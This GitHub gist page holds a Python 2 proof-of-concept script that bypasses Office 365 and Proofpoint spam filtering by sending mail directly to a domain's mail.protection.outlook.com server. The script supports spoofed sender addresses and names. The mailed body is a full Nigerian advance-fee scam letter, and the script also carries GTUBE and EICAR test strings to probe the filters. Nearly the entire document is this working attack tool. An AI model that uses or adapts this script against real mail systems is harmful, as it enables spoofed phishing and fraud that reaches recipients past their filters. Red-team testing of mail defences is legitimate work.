Skip to content

Instantly share code, notes, and snippets.

@gavz
Forked from Und3rf10w/office_365_mail_relay.py
Created August 27, 2017 15:33
Show Gist options
  • Save gavz/f811055c896c20089deda0948530d5d0 to your computer and use it in GitHub Desktop.
Save gavz/f811055c896c20089deda0948530d5d0 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
# Example usage: office_365_mail_relay.py --from-addr [email protected] --to-addr [email protected] --domain example.com --subject "SPAM TIME!" --from-name "John Doe" --to-name "John Smith"
# 20170709 - @Und3rf10w
import dns.resolver
import socket
import smtplib
import argparse
from termcolor import cprint
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Required command line arguments:
parser = argparse.ArgumentParser(prog="office_365_mail_relay.py", usage="%(prog)s [options]", description="POC to bypass 365 spam protections from one 365 user to another, including spoofing")
parser.add_argument('--from-addr', help="The address to send the email message from", required=True, dest='fromaddr')
parser.add_argument('--to-addr', help="The address to send the email message to", required=True, dest='toaddr')
parser.add_argument('--domain', help="The domain of an Office 365 user to use", required=True, dest='domain')
# Optional Command line arguments:
parser.add_argument('--smtp-server', help="The *.mail.protection.outlook.com smtp server to use", default=None, dest='smtpserver')
parser.add_argument('--subject', help="The subject line of the test email", default=None, dest='subject')
parser.add_argument('--from-name', help="The name of the email sender", default=None, dest='fromname')
parser.add_argument('--to-name', help="The name of the email recipient", default=None, dest='toname')
parser.add_argument('--eicar', help="Add the eicar test string to the message body", default=False, action='store_true', dest='eicar')
args = parser.parse_args()
argsdict = vars(args)
fromaddr = argsdict['fromaddr']
toaddr = argsdict['toaddr']
domain = argsdict['domain']
subject = argsdict['subject']
fromname = argsdict['fromname']
toname = argsdict['toname']
mx_record = argsdict['smtpserver']
eicar = argsdict['eicar']
def office_365_check(domain):
'Grabs the SPF record for the domain'
for x in dns.resolver.query(domain, 'TXT'):
if 'v=spf' in x.to_text():
domain_spf = x.to_text()
print "[*] SPF records for " + domain + ": " + domain_spf
if 'protection.outlook.com' or 'sharepointonline.com' in domain_spf:
cprint(("[*] " + domain + " uses Office 365, likely vulnerable to attack"), "green")
return 1
else:
return 0
def get_mx_record(domain):
'Checks for usage of proofpoint for the domain, and grabs an appropriate mx record for the domain'
for x in dns.resolver.query(domain, 'MX'):
domain_mx = x.to_text()
if 'pphosted' in x.to_text():
cprint(("[*] " + domain + " is protected by proofpoint, attempting to resolve the domain's Office 365 SMTP server for spam bypass"), "yellow")
o365_name = domain.replace(".", "-") + ".mail.protection.outlook.com."
return socket.gethostbyname(o365_name)
else:
print "[*] MX records for " + domain + ": " + domain_mx
mx_records = domain_mx.split()
return socket.gethostbyname(mx_records[1])
def send_mail_message(mxserver, fromaddr, toaddr, data, **kwargs):
'Sends a message fromaddr to toaddr using mxserver'
print "[*] Establishing connection to domain's mail server @ " + mxserver
try:
server = smtplib.SMTP(mx_record, 25)
server.helo()
server.sendmail(fromaddr, toaddr, msg.as_string())
cprint(("\n[*] Email sent"),"green")
except smtplib.SMTPRecipientsRefused as e:
cprint(("\n[!] Error sending to recipient "),"red")
cprint(("[-] Recipient: " + toaddr),"yellow")
cprint(("[-] Message : " + str(e.recipients[toaddr])), "yellow")
except Exception as e:
cprint(("\n[!] Error sending message: "),"red")
cprint(("[-] "+ str(e)), "yellow")
# Add the highly spammy message
body = """Dear Sir,
I have been requested by the Nigerian National Petroleum Company to contact you for assistance in resolving a matter. The Nigerian National Petroleum Company has recently concluded a large number of contracts for oil exploration in the sub-Sahara region. The contracts have immediately produced moneys equaling US$40,000,000. The Nigerian National Petroleum Company is desirous of oil exploration in other parts of the world, however, because of certain regulations of the Nigerian Government, it is unable to move these funds to another region.
You assistance is requested as a non-Nigerian citizen to assist the Nigerian National Petroleum Company, and also the Central Bank of Nigeria, in moving these funds out of Nigeria. If the funds can be transferred to your name, in your United States account, then you can forward the funds as directed by the Nigerian National Petroleum Company. In exchange for your accommodating services, the Nigerian National Petroleum Company would agree to allow you to retain 10%%, or US$4 million of this amount.
However, to be a legitimate transferee of these moneys according to Nigerian law, you must presently be a depositor of at least US$100,000 in a Nigerian bank which is regulated by the Central Bank of Nigeria.
If it will be possible for you to assist us, we would be most grateful. We suggest that you meet with us in person in Lagos, and that during your visit I introduce you to the representatives of the Nigerian National Petroleum Company, as well as with certain officials of the Central Bank of Nigeria.
Please call me at your earliest convenience at 18-467-4975. Time is of the essence in this matter; very quickly the Nigerian Government will realize that the Central Bank is maintaining this amount on deposit, and attempt to levy certain depository taxes on it.
Yours truly,
Prince Alyusi Islassis\r\n"""
# Add the GTUBE test string (http://spamassassin.apache.org/gtube/)
body += "XJS*C4JDBQADN1.NSBN3*2IDNEN*"
body += "GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34\r\n"
if eicar is True:
msg = MIMEMultipart('alternative')
else:
msg = MIMEMultipart()
if fromname is not None:
msg['From'] = "%s <%s>" %(fromname, fromaddr)
else:
msg['From'] = "%s" %(fromaddr)
if toname is not None:
msg['To'] = "%s <%s>" %(toname, toaddr)
else:
msg['To'] = "%s" %(toaddr)
if subject is not None:
msg['Subject'] = "%s" %(subject)
else:
msg['Subject'] = ""
# Add the eicar attachment if option is passed
if eicar is True:
eicar_string = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-ST"
eicar_string += "ANDARD-ANTIVIRUS-TEST-FILE!$H+H*\r\n"
attachment = MIMEText(eicar_string)
attachment.add_header('Content-Disposition', 'attachment', filename='eicar.txt')
msg.attach(attachment)
content = MIMEText(body, 'plain')
msg.attach(content)
# Check to see whether 'domain' uses office 365
result = office_365_check(domain)
if result != 1:
cprint(("[*]" + domain + " likely not vulnerable to attack."),"red")
# Resolve the MX record for 'domain'
if mx_record is None:
mx_record = get_mx_record(domain)
# Send the spammy email
send_mail_message(mx_record, fromaddr, toaddr, msg)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment